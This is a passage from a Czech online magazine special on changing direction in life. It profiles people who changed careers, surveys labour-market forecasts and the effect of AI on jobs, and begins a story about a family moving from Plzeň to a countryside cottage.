    <t>Speciál: Změna směru práce místa vztahu těla a duše Chceš-li rozesmát Boha, řekni mu o svých plánech. Citát Woodyho Allena platí v posledních pěti letech víc než dřív. Světem otřásly pandemie, skutečné i kulturní války, inflace. Dochází k překreslování zvyklostí, geopolitických map a oblastí vlivu. Pocit nejistoty ale nedoléhá jen na státy a velké hráče, na individuální úrovni ji vnímá každý, nejisté vyhlídky pak urychlují nutnost nebo přímo touhu po něčem novém. Tuto poptávku vnímáme i v lifestylové rubrice Aktuálně.cz. Čtenáři mají o příběhy lidí, kteří opustili zajeté koleje, značný zájem. Speciál Změna směru jim jde naproti a zaměřuje se na hledání nových cest v oblastech práce, bydlení, vztahů a duševní pohody. Přestože se i tentokrát snažíme daná témata představit i v širším kontextu v podobě statistik a pohledu odborníků, stojí projekt hlavně na mimořádně osobních příbězích lidí, kteří se o ně s námi rozhodli laskavě podělit. Doufáme, že čtenáře jejich otevřenost inspiruje a třeba jim pomůže zbavit se omylu, o kterém v jednom z našich rozhovorů hovoří psycholog Dalibor Špok. Podle něj není rizikem samotná změna, ale mýtus, že má vše zůstat tak, jak je. „To je nebezpečné pojetí života a taky důvod, proč mnozí lidé od střední dospělosti po stáří končí psychicky strašně špatně. Přestali totiž ‘umět’ udělat změnu.“ Přejeme vám odvahu a příjemné čtení. Změna práce Foto: Jaroslav Hora / Aktuálně.cz Jaroslav Hora: Život je víc než jen čísla. Odešel z korporátu, přežil těžkou nemoc a dělá, co ho těší Tomáš Vocelka „Život je změna. A já mám změny rád,“ říká fotograf a majitel cestovní kanceláře Jaroslav Hora. U mnoha lidí by to byla jen hovorová fráze, to pro něj ale neplatí. Byl programátorem, kotelníkem, pracoval v bezpečnostní agentuře, dělal obchodního ředitele a také manažera v nadnárodním korporátu. Zažil vyhoření, zakládání i prudký rozvoj vlastní firmy. A pak také těžkou nemoc s nízkou šancí přežít. Dnes dělá, co ho baví a těší. Má úspěšnou cestovní kancelář zaměřenou na fotografy. Pětapadesátiletý Jaroslav Hora patří ke generaci, jejíž životy zásadně změnil pád komunistického režimu v roce 1989. Svět, ve kterém vyrůstal, se rozpadl a objevilo se moře do té doby netušených možností. Ještě před revolucí dokončil gymnázium a chvíli studoval automatizované systémy řízení na Vysoké škole ekonomické. „Po roce jsem se na to vykašlal. Šel jsem tam, abych se naučil programovat, ale z devadesáti procent nás učili ptákoviny. Vytáčely mě dějiny KSČ a mezinárodního dělnického hnutí, stejně tak i ruština,“ říká. Předčasný odchod z vysoké školy tehdy obvykle znamenal jediné: dva roky na vojně. Když si je odkroutil, nastoupil do Podniku výpočetní techniky a o něco později se stal programátorem v Kovopodniku Nymburk. „Zároveň jsem však pracoval v kotelně, abych si vydělal nějaké peníze, protože programátoři tehdy brali třikrát méně než kotelník. „Občas jsem musel jít zatopit už ve tři ráno, pak jsem v sedm zasednul k počítači a začal programovat skladové hospodářství. A v průběhu dne jsem průběžně odbíhal přikládat,“ vypráví. Od dispečera u Pinkertonů do křesla obchodního ředitele Listopad 1989 přinesl obrovské změny. Otevřela se devadesátá léta, kdy „nic nebylo nemožné“, a to v dobrém i špatném smyslu slova. Není potřeba vyjmenovávat všechny pracovní pozice, kterými Jaroslav Hora prošel, ale pracoval také třeba jako dispečer v bezpečnostní agentuře Pinkerton . „Pak přišla přes kamarádku nabídka, ať jdu na výběrové řízení. Hledali obchodního ředitele ve firmě Next , vyrábějící bezpečnostní dveře. „Já z ostrahy půjdu dělat někam obchodního ředitele?“ pochyboval. „Hele, zkus to, jsi dobrý a myslím, že bys to zvládl,“ opáčila kamaráda. Tak šel. A vyhrál výběrové řízení. “Jedna kariéra, jedna rodina, jenom přibývají ta auta v garáži a tak podobně. To je nebezpečné pojetí života a taky důvod, proč mnozí lidé z té střední dospělosti a ještě více potom ve starší dospělosti, ve stáří, končí z hlediska psychiky strašně špatně. Přestali totiž “umět” udělat změnu.” celý článek „Výhodou bylo, že jsem byl zpočátku ředitelem sám sobě. Obchodní oddělení ještě neexistovalo a bylo na mně, abych ho vybudoval,“ vypráví. Postupně dal dohromady celý dobře fungující tým. Po určité době pak dospěl do bodu, kdy si se spolumajiteli přestal rozumět a začal uvažovat o odchodu jinam. V té době dostal nabídku ucházet se o místo obchodního zástupce v nadnárodní firmě Hilti , která vyrábí nářadí a zařízení pro stavební průmysl. „Z ředitele na obchoďáka to byl trochu sestup, ale nabízeli mi tam hodně zajímavé podmínky a byla to nadnárodní firma,“ vypráví. Místo přijal a nakonec ve společnosti pracoval devět let. Vypracoval se až na pozici regionálního ředitele prodeje. Pak přišla velká krize ve stavebnictví a obrovský propad se odrážel i ve výsledcích prodejů nářadí pro stavebníky. „Jenže my jsme měli čísla namalovaná jinak, než by odpovídalo realitě na trhu,“ konstatuje Hora . „Přišel za mnou generální ředitel a řekl mi: Jardo, musíte to s obchoďáky dát. Svolal jsem si lidi a říkám: Kluci, na rovinu, buď teď ta čísla tři měsíce po sobě dáme, nebo mám smůlu a budu muset skončit.“ Tým se za něj postavil a s obrovským nasazením dosáhl v podstatě nemožného. Generální ředitel ho pak pozval na golf. „Tak co, Jardo, vy jste to dali, že?“ ptal se. A Hora mu oznámil, že ve firmě končí. „Jak končíš?“ „Je mi to líto, ale končím. Mám toho plný zuby a nebaví mě to.“ „A proč jsi nedal výpověď, už když jsem ti řekl, že máš namále?“ „Protože jsem ti chtěl dokázat, že to dáme.“ Jaroslav Hora v době, kdy pracoval ve špičkové manažerské pozici v nadnárodní firmě Hilti . Foto: Jaroslav Hora Když podal výpověď, cítil se po dlouhodobém tlaku úplně vyhořelý. Netěšilo ho, jak se ve firmě po změně vrcholového managementu proměnil i přístup. Najednou už tolik nezáleželo na lidech, velkou modlou se místo toho stala „čísla“. Psal se rok 2005 a Hora se začal poohlížet po něčem jiném. „Protože jsem rád fotografoval a uměl i programovat, založil jsem s kamarádem firmu zaměřenou na tvorbu webů a focení. Z občas i šesticiferné výplaty jsem najednou spadl na deset, patnáct tisíc měsíčně. Ale dělal jsem, co mě bavilo. Po finanční stránce to byl pád na hubu, ale psychicky mi bylo parádně.“ Hora měl něco málo našetřeno, takže si řekl, že rok utáhne a pak se uvidí. Hitem nové firmy byly virtuální 3D prohlídky, byznys nabíral na otáčkách a brzy měli celý tým. Práce prudce přibývalo, tým se zvětšil, dostávali zakázky od velkých a známých firem. Jaroslav Hora přiznává, že tehdy pracoval šestnáct i osmnáct hodin denně. Pak přišla leukemie Cítil se unavený, vyhořelý a delší dobu mu nebylo dobře. V roce 2009 odjel s rodinou na dovolenou, aby si odpočinul. Jenže když se vrátili, cítil se ještě hůř. Potíže se stupňovaly. Nakonec mu lékaři diagnostikovali leukemii. Byly to těžké časy. Léčení, naděje, uzdravení. Pak se nemoc vrátila. A pak ještě jednou. „Později jsem se od mé lékařky dozvěděl, že jsem měl pravděpodobnost přežití kolem dvou až tří procent,“ vzpomíná Hora . Jeho optimistická povaha mu pomáhala věřit, že všechno dobře dopadne. "Nechceme být křečci v kolečku." Český pár žije v jeskyni na kanárském ostrově Protože byl nemocný a spolumajitel táhl firmu sám, rozhodl se mu svůj díl odprodat. K penězům, které získal, si přibral hypotéku a rozhodl se, že začne stavět dům. „Hypotéku jsem si bral v době, kdy mi bylo úplně nejhůř,“ přiznává. V nemocnicích potkal hodně lidí s podobným osudem. Mnoho z nich se uzdravení nedočkalo. „Po čase už jsem uměl odhadnout, jak to skončí,“ říká. „Samozřejmě nejsem jasnovidec, ale jakmile to člověk vzdá ve své hlavě, vzdá to pak i jeho tělo a je konec,“ konstatuje. Viděl kolem sebe případy, kdy přežili lidé, jako byl on sám. Ti, kteří měli šanci jen pár procent, se uzdravili. Naopak u těch, kteří měli dobré vyhlídky, to skončilo špatně. Ví, že on sám má velkou výhodu. Spočívá v optimistickém naladění jeho osobnosti. „Nikdy jsem si nepřipustil, že umřu, i když jsem byl srovnaný s tím, že se to může stát. Tělo má obrovskou schopnost se samo uzdravit. Nevěřím na bylinky a šamany, ale v sílu, kterou má člověk v hlavě. A samozřejmě také v lékaře, kteří vám pomáhají.“ Nemoc člověku změní priority Když se dostal z nejhoršího, založil obchodní firmu a prodával produkty společnosti, kterou předtím s kamarádem založili. „Dělali jsme třeba Street View a Business View pro Google,“ vypráví. Práce bylo hodně, ale netěšila ho. Nemoc mu změnila priority, uvědomil si, že chce dělat opravdu jenom to, co ho baví. A s lidmi, se kterými je mu dobře. Vždycky rád cestoval, vyrazil proto na Lofoty , aby viděl polární záři, což si vždycky přál. Byl to pro něj úžasný zážitek. A tak se rozhodl, že založí cestovní kancelář, kterou propojí se svou vášní pro fotografování. Původně neměl velké plány, ale věděl, že bude kolem sebe potřebovat další lidi, protože po dlouhodobé léčbě leukemie musí občas počítat s nějakými zdravotními komplikacemi. Přilákal tak do své nově vzniklé Czech Photo Travel známé české fotografy, aby dělali lektory a průvodce. „Vybírám si lidi, kteří jsou příjemní a sympatičtí, se kterými se mi dobře spolupracuje,“ říká. Firma už funguje přes pět let a rychle roste. Nyní už je do jejího chodu zapojeno přes třicet lidí. „Teď už to začíná být trochu náročné, v sezoně děláme i šest zájezdů měsíčně,“ říká. Bez lidí, kteří tě podrží, to nejde Na otázku, jak se mu daří se se všemi změnami vyrovnávat, odpovídá bez váhání. „Změny mě vlastně baví,“ říká. „Zároveň ale musíte mít kolem sebe blízké lidi, kteří vás podrží, když je zle. Moje žena vždycky věřila, že to zvládnu,“ říká Hora . Ať už šlo o odchod z korporátu, nebo o nemoc. "Co životu dáte, to vám vrátí," říká paralympionik Ježek, který přišel o nohu Jaroslav Hora se naučil, jak obrovskou cenu má zdraví. „Je důležité nezatěžovat hlavu a nedostávat se do velkého stresu, který je spouštěčem různých nemocí,“ říká. Když zpětně hodnotí své životní změny, uznává, že z korporátu se mu podařilo odejít právě včas. Když ale následně začal podnikat a v práci trávil i osmnáct hodin denně, zašlo to podle něj příliš daleko. Věří, že právě tato enormní zátěž přispěla k tomu, že onemocněl. „Naučil jsem se hodně: Nedělat všechno sám, delegovat práci a dokázat žít s chybami,“ vysvětluje. Ačkoliv ani dnes nemá takový příjem, jaký měl coby manažer v nadnárodním korporátu, netrápí ho to. Stojí mu to za svobodu, kterou má, za možnost pracovat s lidmi, se kterými je mu dobře, a za to, že jeho život se nesmrskne do jediné touhy a motivace: Udělat čísla. „Dělejte v životě jen to, co vás baví, a s lidmi, kteří vás baví. Pak můžete dosáhnout úspěchu a hlavně být zdraví," doporučuje Jaroslav Hora. zpět na začátek článku Foto: Tomáš Škoda / Aktuálně.cz Jiří Labanc Cesta k práci, která člověka baví, může být někdy pořádně klikatá. Iva Pozidu by o tom mohla vyprávět. Pracovala třeba v řetězci McDonalds nebo jako úřednice. Momentálně je softwarovou testerkou v bance. “Za našich rodičů platilo, že ve dvaceti nastoupíte do práce a něco po šedesátce jdete do důchodu. Ta doba je ale pryč,“ říká. S šestatřicetiletou Ivou se setkáváme v brněnské kavárně. Má za sebou řadu pracovních zkušeností z poměrně nesourodých oblastí. Ona sama přiznává, že její okolí tyto přestupy z jednoho zaměstnání do druhého příliš nechápalo. Je přece správné a žádoucí držet se jedné práce a oboru… Podle Ivy Pozidu to však je jenom společenské klišé. “Nemusíme dělat nic, co nechceme,” říká a přidává okřídlené doporučení o vystoupení z komfortní zóny. Co jí takové opuštění pohodlného území přineslo? Problém byl už ve škole. Nevěděla, co chce dělat „O budoucí práci jsem v pubertě neměla jasnou představu.“ O výběru střední školy za ni tehdy rozhodli dospělí. “Přihláška na matematický gympl ale nebyla dobrá volba pro holku, které matika nikdy nešla," kroutí dnes hlavou. Přijímačky na gymnázium nezvládla, a tak po prázdninách nastoupila na zdravotnický obor. Jenomže už tehdy věděla, že to opět není ta správná cesta. Tehdy nebyla výjimkou a ojediněle podobná situace nenastává ani dnes. Z rozsáhlého průzkumu poradenské společnost Trexima z loňského roku vyplynulo, že s výběrem střední školy a zvoleným oborem není spokojená téměř polovina studentů (48 procent). Vzorek zahrnoval 15 tisíc dotázaných z celkem 224 českých středních škol. Studium Ivě nedalo moc práce, a tak už od šestnácti let začala pracovat v řetězci rychlého občerstvení McDonald’s. “Z brigády se pak stala práce na plný úvazek na dalších deset let,“ vypráví. Mnohaleté zkušenosti ve fastfoodu pomohly Ivě ke zkušenostem v řízení týmu, prošla si ale také deziluzí. Po nástupu mladších kolegů si tým přestal rozumět a táhnout za jeden provaz. Tvrdí, že odešla v pravý okamžik. “Vrátila jsem se zpátky do školních lavic,“ popisuje svůj další plán. Na Vyšší odborné škole začala studovat obor Veřejně správní činnosti a po jeho dokončení nastoupila na právní oddělení exekutorského úřadu. Práce v monotónním prostředí ji ale moc netěšila. “Potřebuju, aby mě povolání rozvíjelo. Musím si zvedat laťku, co ještě zvládnu, kam až můžu dojít," vysvětluje. Jenže takovou možnost na úřadě neměla. Úřednice, matka, copywriterka. Co tomu řeknou lidi? Když bylo jejímu synovi půl roku, začala Iva pracovat v úplně jiném oboru. Jako copywriterka vytvářela marketingové popisy k různým produktům. I na této pozici vydržela zhruba dva roky. Už během toho se ale začala zajímat o informační technologie. "Považoval jsem se tehdy za humanistu a intelektuála, ale zároveň si nějak potřeboval morálně obhájit, že jdu studovat obor, který je kompletně založený na manipulaci lidí," vysvětluje Staffen, kterého dle jeho slov marketing autenticky zajímal. Zároveň se jej však nerozhodl studovat proto, aby se jím mohl v budoucnu živit." celý článek Na Facebooku narazila na příspěvek své kamarádky, která absolvovala vzdělávací kurzy u organizace Czechitas. Ta už roky pomáhá (především) ženám poznat svět IT. Spontánně se tehdy rozhodla zkusit to také a absolvovala několik jednodenních kurzů. Přestože podobné změny oborů a pracovních pozic jsou v posledních letech stále častější, i ona se obávala, co jejímu hledání “řeknou lidi”. "Ale já přece nemusím dělat vůbec nic, co nechci," říká dnes rozhodně. Starší generace má podle mladé ženy zakořeněnou představu, že svůj pracovní život musí zasvětit jediné práci a v ní být až do důchodu. "Naši rodiče byli zvyklí mít vše nalajnované. Ve dvaceti nastoupíte do práce a někdy po šedesátce jdete do důchodu. Ta doba je ale pryč," je přesvědčena Iva. "Některým lidem vyhovuje dělat stejnou činnost patnáct let v kuse a já to chápu. Ale není to nic pro mě," vysvětluje. Zájem o IT jí přinesl novou práci Dnes je už pět let zaměstnaná v bance Air Bank , kam nejdřív nastoupila pouze na krátkodobou brigádu. Nakonec to však dopadlo podobně jako v řetězci rychlého občerstvení. "Po sotva dvou týdnech za mnou přišla kolegyně, že odchází na mateřskou, a tak jsem ji zastoupila." Během práce v bance se rozhodla přihlásit na tříměsíční Digitální akademii Czechitas. Byla to pro ni zkouška ohněm. Ne že by za to mohla náročnost kurzu, obtížné bylo hlavně skloubit studium s péčí o dvouleté dítě a plným pracovním úvazkem v bance. Aby toho nebylo málo, kurz Czechitas začal v tu nejméně vhodnou dobu - na začátku covidové pandemie v roce 2020. Iva ho musela absolvovat pouze online. Odměnou za dokončení akademie se pro Ivu stala nabídka spolupracovníka z vedlejšího oddělení, který si všiml jejího zájmu o IT. Díky ní teď pracuje v oddělení funkčního testování. Sama dodává, že nástup do banky byla spíš náhoda. Když padne otázka, co bylo pro ni na změnách práce nejtěžší, odpovídá Iva trochu nečekaně. “Nejtěžší bylo stát se matkou. To, co mě naučil syn, mi zatím nedalo žádné zaměstnání. Syn je mi obrovskou školou i zrcadlem. Být matkou je zároveň nejkrásnější i ta nejnáročnější práce,“ konstatuje. Plán do budoucnosti? Nemám Po svých zkušenost věří, že povaha práce bude proměnlivá už vždycky. V posledních dvou letech se hodně mluví o umělé inteligenci, která začíná zasahovat do nejrůznějších oborů lidské činnosti. Z Mikulova za americkým snem. Fotografka uklízela, teď fotí pro Nike a velké značky "Strašáci říkají, že AI vezme práci lidem v kancelářích. To se ale stane, pokud si ji vzít nechají. S umělou inteligencí se sama snažím pracovat, abych ji byla schopna využít a zapojit ji do toho, co dělám," říká. Flexibilitu ji naučily životní okolnosti a raději si nedělá plány do budoucna. "Neplánuju od chvíle, kdy mi náhle zemřela máma," zamýšlí se dnes. Do životního zvratu fungovala přesně opačně a chtěla vědět, co bude následovat. “V tom okamžiku se všechno zbortilo a zjistila jsem, že donekonečna tak fungovat nemůžu. Snažím se plánovat bezprostředně, nikoliv dlouhodobě. Kdybych měla čistě hypoteticky přijít ze dne na den o práci, půjdu holt jinam. I kdyby šlo o něco nezáživného, je mi to jedno, v prvé řadě jde o zajištění rodiny," míní. Horší to přece nebude Zahodit veškeré předsudky, obavy a prostě zkusit změnu je podle Ivy lepší, než si na konci života vyčítat trávení času činností, která člověka nenaplňuje. "Horší to přece nebude. Buď krok uděláme a bude to lepší, nebo povede cesta jinudy. Jde o to, odpoutat se od představy, že 'něco nějak musí být'. Okolí nám bude vždycky předhazovat, že musíme mít vlastní dům, minimálně dvě děti a podobné věci. Nátlak přichází ze všech stran a záleží na tom, jak se s ním popereme. Nemusíme ale dělat nic, co sami nechceme," vrací se ke své mantře. zpět na začátek článku Foto: Shutterstock / Aktuálně.cz Změny pracovního trhu jsou neúprosné. Učit se novému je ale jednodušší, než se zdá. Chce to jen vůli Jiří Labanc Podle studií se v následujících letech obmění až čtvrtina všech dnešních povolání. V Česku pak změna práce ohrožuje asi milion pracujících. Do fungování pracovního trhu navíc vstoupil zásadní hráč – generativní umělá inteligence. Expert na nová média vysvětluje, jak se neztratit v budoucím světě technologií. Zásadní roli podle něj bude hrát schopnost se správně ptát. Naučit se to ale vyžaduje vůli. Jak se do budoucna změní trh práce, si netroufne odhadnout nikdo soudný, kdo by za své předpovědi vzal zodpovědnost. Teoreticky bychom zde mohli skončit a nechat otázku otevřenou. Naštěstí existují trendy, které možný – střednědobý – vývoj předpokládají, a do jisté míry se jich lze držet. Ve zprávě, kterou minulý rok vydalo Světové ekonomické fórum, figurují tři konkrétní oblasti řídící změnu trhu na celém světě – přechod na zelenou ekonomiku, technologie a ekonomické výhledy. Součástí šetření bylo na osm stovek firem, které zaměstnávají přes 11 milionů pracovníků ve 45 celosvětových ekonomikách. Průzkum probíhal od listopadu 2022 do února 2023 a zaobíral se střednědobým horizontem pěti let. Přibližně s takovýmto výhledem bude pracovat i následující text. Ostříhal ji nožem na koberce, dnes je brněnskou legendou. "Byla odvážná," říká Holič Podle výsledků celosvětového reportu se do příštích pěti let obmění 23 procent všech zaměstnání. Z 637 milionů pracovních míst (což je taky číslo, které se odráží v celkovém souboru údajů v této zprávě) očekávají firmy nárůst počtu zaměstnání o 69 milionů a pokles o 83 milionů. Reálně tedy klesne počet pracovních míst o 14 milionů. Velké změny, potažmo obměnu zaměstnanců, respondenti šetření očekávají v dodavatelském řetězci a v odvětvích dopravy a médií, zábavy a sportu. Menší změny se čekají ve zpracovatelském průmyslu a v maloobchodech či velkoobchodech se spotřebním zbožím. Když se konkrétně podíváme na Evropu , report zmiňuje, že ve druhé polovině roku 2022 byly nejpotřebnějšími profesemi ošetřovatelé, instalatéři, potrubáři, řidiči těžkých nákladních aut a kamionů, vývojáři softwaru, systémoví analytici, svářeči a řezači plamenem, zedníci a podobná řemeslná zaměstnání. Čeká nás rekvalifikace Na pokles pracovních pozic – tentokrát už v Česku – upozorňuje i dva roky stará studie Budoucnost českého pracovního trhu od společností Boston Consulting Group a Aspen Institute Central Europe. Výzkum operuje s výhledem až do roku 2030, ale i s dlouhodobějším horizontem (ten souvisí například se stárnutím populace). Zánik pracovní pozice do následujících let v Česku ohrožuje zhruba milion pracujících osob z celkových asi pěti milionů ekonomicky aktivních lidí. Na 330 tisíc lidí čeká úplná rekvalifikace, protože jejich dosavadní pozice zaniknou. Na druhou stranu ale vznikne více než pět set tisíc nových neobsazených pracovních míst. Mezi ohrožené pozice patří pomocní pracovníci ve výrobě, dopravě nebo skladování, dále prodavači anebo úředníci v logistice. Mezi výčet se dostali i lékaři, ti jsou ale specifičtí. Zjednodušeně řečeno se díky navýšeným kapacitám absolventů očekává, že do zdravotnictví přijde více lékařů, než bude odcházet, a stabilizuje se tak jejich nynější nedostatek. Navíc je možné, že dojde ke snížení přesčasů a zkvalitnění péče. Změna kariéry není nic neobvyklého. V Česku pomáhá lidem s kariérní změnou Úřad práce, a to pomocí rekvalifikačních kurzů. Přeškolit se tak můžete na floristu, grafika, tvorbu webu nebo řidiče autobusu. V roce 2023 se klasických nebo volených rekvalifikací zúčastnilo téměř 30 tisíc lidí. Největší skupinou byli absolventi kurzu ČJ pro cizince, řidiči a počítačové rekvalifikace. Mezi proškolenými bylo i pět tisíc vysokoškoláků. zobrazit vše Nedostatkovými profesemi budou řemeslníci, kvalifikovaní pracovníci ve stavebnictví, kuchaři, číšníci nebo analytici a softwaroví vývojáři. Výčtem mnoha proměn bychom mohli pokračovat (ostatně úvodní report Světového ekonomického fóra má téměř 300 stran). Změny ale mohou probíhat i na úrovni jednotlivců. Světový report totiž zmiňuje schopnosti a dovednosti, které jsou na vzestupu. První tři příčky obsadilo analytické myšlení, kreativní myšlení a technologická gramotnost. Z české analýzy zase vyplynulo, že se do roku 2030 zásadně zvýší požadavky na aspoň základní digitální dovednosti pracujících, což lze připodobnit právě k technologické gramotnosti. V současnosti takovou schopnost vyžaduje asi 54 procent pozic, do zmíněného roku to má být 90 procent. Odborníci též zmiňují nutnost rozšiřovat znalosti světových jazyků nebo měkkých dovedností (jako jsou spolehlivost, zodpovědnost a schopnost komunikace). Pakliže tedy přemýšlíme nad tím, kam ubírat svou pozornost, máme už o něco lepší představu. Ale opět – jde o trend, nikoliv precizní věštění budoucnosti. Není však překvapující, že jejím hybatelem budou vedle přechodu na zelenou ekonomiku i digitální technologie a hráč, který se dostal do povědomí nejširší veřejnosti před dvěma lety – strojové učení, respektive generativní umělá inteligence. Co vše ovlivní AI Umělou inteligenci (AI) si v rámci reportu Světového ekonomického fóra plánuje osvojit 75 procent firem. Polovina z nich míní, že její zavádění povede k nárůstu pracovních míst, 25 procent společností čeká opačný trend. Letošní zpráva Mezinárodního měnového fondu zmiňuje, že v bohatých zemích může dopadnout až na 60 procent pracovních míst. V rámci nízkopříjmových a rozvojových zemí to může být 40 procent, respektive 26 procent pracovních míst. "Ceněná bude emoční a duševní inteligence, protože nástroje AI nebudou schopny napodobovat třeba lidskou péči a dotek se stejnou autenticitou,“ míní Josef Šlerka . Foto: Adéla Leinweberová Podle mediálního analytika Josefa Šlerky , který AI popularizuje a dlouhodobě se věnuje jejímu využití v humanitních vědách, máme tendence přeceňovat krátkodobé dopady a naopak podceňovat ty střednědobé a dlouhodobé. V horizontu několika let podle něj uvidíme změny, které se budou týkat spíše nízkoplacených pozic. Ohroženi umělou inteligencí budou podle Šlerky i zaměstnanci call center, úředníci a pracovníci technické podpory. Z dlouhodobého hlediska AI zasáhne třeba marketéry, právníky i učitele. Naopak některým povoláním – třeba technickým oborům – může AI pomoci zvýšit výkon. I to má ale svá úskalí, protože zatímco mladší a méně zkušení pracovníci mohou díky AI zefektivnit svou práci, starší pracovníci mohou marně držet krok. Dopad ale může být i opačný a umělá inteligence může mladým zaměstnancům znesnadnit budování kariéry. Ač by se mohlo zdát, že AI vezme v první vlně práci překladatelům, Šlerka podotýká, že tomu tak být nemusí. „Strojový překlad jim naopak umožní věnovat se jazykovým specialitám,“ myslí si vysokoškolský pedagog, který ještě donedávna na Karlově univerzitě v Praze vedl obor Studia nových médií. Trochu božskosti a vlastní dril Co z toho prozatím vyplývá? Stojíme na rozcestí – buďto se naučíme pracovat s AI (a obecně s digitálními technologiemi), anebo začneme pracovat rukama. K tomu, jak moc se AI podepíše na naší práci, můžeme využít i jednoduchou úměrnost: čím více pracujete u počítače, tím pravděpodobnější je, že vaši práci silně zasáhne (ne-li nahradí) stroj. "Snažím se plánovat bezprostředně, nikoliv dlouhodobě. Kdybych měla čistě hypoteticky přijít ze dne na den o práci, půjdu holt jinam. I kdyby šlo o něco nezáživného, je mi to jedno, v prvé řadě jde o zajištění rodiny." celý článek Rozhodneme-li se tedy pro první možnost, rada, jak začít, je podle Šlerky prostá. Stačí si na YouTube pustit vzdělávací videa o daném tématu. Mediální analytik zároveň podotýká, že nejdůležitější dovedností v budoucnu nebude technologická gramotnost ani kreativní či analytické myšlení, které zmiňuje report výše. Před výčet dovedností by zařadil verbální schopnost se správně vyjadřovat. „Budeme-li se bavit o generativní AI ve smyslu ChatGPT a podobných nástrojů, můžeme práci s nimi přirovnat k programování. Akorát při tom nepoužíváme speciální programovací jazyk, ale běžnou češtinu nebo angličtinu. Princip ale zůstává stejný. Jak věci pojmenujeme, tak je konkrétní nástroj vykoná,“ míní. Novinky v oblasti AI přicházejí každým týdnem a není v našich silách se dokonale naučit s každým nástrojem pracovat. Reálnější však je pochopit, jak AI funguje a k čemu nám může v běžném i pracovním životě pomoci. Budoucnosti práce se věnovala i jedna z epizod podcastu Beyond AI z dílny technologického magazínu WIRED. Vedle zástupce předního japonského výrobce robotů Tadahiro Kawady nastínil svůj pohled i odborník na technologickou transformaci Yuri van Geest. Veškerou rutinní práci podle něj automatizuje AI. „Nicméně věřím, že se díky tomu objeví i nová pracovní místa. Ceněná bude emoční a duševní inteligence, protože nástroje AI nebudou schopny napodobovat třeba lidskou péči a dotek se stejnou autenticitou,“ tvrdí Geest s tím, že se posuneme od ekonomiky rukou k ekonomice srdcí, mozků a duševna. Josef Šlerka ale namítá, že to vše AI zvládne za nás. Ne hned, v budoucích letech však ano. „Za pár let většině lidí nebude záležet na tom, že komunikují se strojem,“ tvrdí. Kdo nic nezkouší a neselhává při tom, nevytvoří nic nového. Foto: Shutterstock Přesto se ještě vraťme k perspektivě původních dovedností na vzestupu. Technologickou gramotnost nepřekvapivě buduje práce s technologiemi. Naučit se analytickému a kreativnímu myšlení zároveň ale podle Josefa Šlerky dovede skutečně málokdo. „Dobří analytici jsou schopni problémy logicky rozebrat na součástky a rozhodovat se na základě dat. Kreativní lidé se velmi často rozhodují na základě intuice. Většinou platí, že analytici nejsou dobrými kreativci. Podotýkám, že většinou,“ říká Šlerka . Obojí jde ale podle něj cvičit čtením a psaním. Chce to ale tvrdou disciplínu. „Věci se musíte snažit pochopit a zároveň se pokoušet něco dělat. Jedno se neobejde bez druhého. Například kreativita je spojena se špetkou čehosi ‚božského‘. Ale hlavní komponentou je vlastní drilování. Pokud nic nezkoušíte a neselháváte, nikdy nebudete kreativní,“ dodává. zpět na začátek článku Změna místa Tomáš Maca Smog, ucpaná doprava, stres a davy lidí. Leckterého městského člověka někdy napadne, jestli má tohle všechno zapotřebí a není čas zmizet na venkov, kde konečně najde klid. Ne každý pro to ale najde odvahu. Manželé Lukáš a Tereza Pumprovi se po letech v Plzni ke stěhování skutečně rozhoupali. Koupili a zrekonstruovali starou chalupu, kde teď spokojeně žijí se třemi dětmi, dvěma psy a devíti ovcemi. Z rybníčka na návsi obce Železný Újezd se ozývá hlasité kvákání žab. Hned vedle stojí bezmála 180 let starý dům, k jehož brance právě přibíhá dvojice psů. „Neskákejte,“ uklidňuje přátelské chlupáče čtyřiačtyřicetiletý Lukáš Pumpr a vede hosty z Prahy ke stavení. Tam už je vítají taky jeho o pět let mladší žena Tereza a tři děti – osmiletý Kilián, pětiletá Josefína a nejmladší Vilém. Za citlivě zrekonstruovanou chalupou se otevírá rozlehlá zahrada s výhledem do otevřené krajiny Brdské vrchoviny. „Bohužel se mi zrovna pokazila sekačka,“ omlouvá se Lukáš za přerostlou trávu. Na zadní část pozemku si ovšem rodina pořídila zdatné pomocníky, pase se tam devět ovcí. Některé před ostrými paprsky červnového poledního slunce hledají úkryt pod velkoryse vybavenou maringotkou, kterou manželé Pumprovi začali před časem nabízet k ubytování. „Měli jsme i slepice s kohoutem, jenomže nám je nedávno zahubila liška,“ posteskne si Lukáš, zatímco připravuje dřevo, aby roztopil gril. Stačí chvíli sedět u ohně a pozorovat, jak Kilián leze po stromě nebo jak se Vilém sápe po dalších a dalších kouscích zeleniny, aby návštěvníci pochopili, proč se tu Pumprovi usadili. Oba manželé vyrůstali ve městě. Tereza je z Plzně , Lukáš pochází z Jindřichova Hradce a během studií bydlel v Brně i v Praze . Seznámili se před třinácti lety právě v Plzni , kde si Tereza později otevřela malou kavárnu, jednu z prvních ve městě s výběrovými zrny, a Lukáš tam měl jako grafický designér vlastní studio. „V dětství jsme sice oba trávili hodně času na chalupě, ale jinak jsme založením spíš městští lidé. Rádi jsme si užívali místních kaváren, barů nebo klubů. Všech těchhle benefitů navíc v Plzni za poslední roky výrazně přibylo, takže bylo kam chodit,“ vrací se Tereza do rodného města. Připouští, že než se jim narodil první syn, o stěhování na venkov neuvažovali. „Ačkoli jsme měli krásný byt přímo v centru, u Chodského náměstí, s příchodem rodičovství se nám perspektiva úplně otočila. V městském prostředí, které pro nás do té doby bylo naprosto vyhovující, jsme najednou začali vnímat spíš všechna možná rizika. Veškerá doprava je v Plzni stažená dovnitř, takže se musíte neustále vyhýbat autům. Na relativně malé město je tam hrozný hluk a špatný vzduch. Taky se tam motají divní lidé. V Plzni je totiž spousta ubytoven, které nejsou nijak zvlášť korigované. Jednu jsme měli hned vedle baráku, obden tam blikaly policejní majáčky. Proto jsme postupně dospěli k závěru, že je načase vypadnout,“ vyjmenovává Lukáš nevýhody života ve městě. V roce 2016 tak začali pátrat po chalupě, kam by z Plzně aspoň o víkendech mohli uniknout. Líbila se jim zvlněná krajina na jih od města plná neokázalých, ale přívětivých vesnic, a tak hledali volnou nemovitost právě mezi nimi. „Kraj poblíž CHKO Brdy nás zaujal i proto, že místní nadmořská výška ani jílovitá půda nesvědčí extenzivnímu zemědělství. Namísto polí tady máte spíš pastviny, louky a lesy,“ pochvaluje si Tereza. Najít vysněnou chalupu v původním stavu s velkým pozemkem však trvalo déle, než si představovali. Na inzeráty, které vylepovali na obecních nástěnkách, nikdo nereagoval. Když přes web s realitami konečně našli dům, který by jim vyhovoval, vyfoukl jim ho jiný 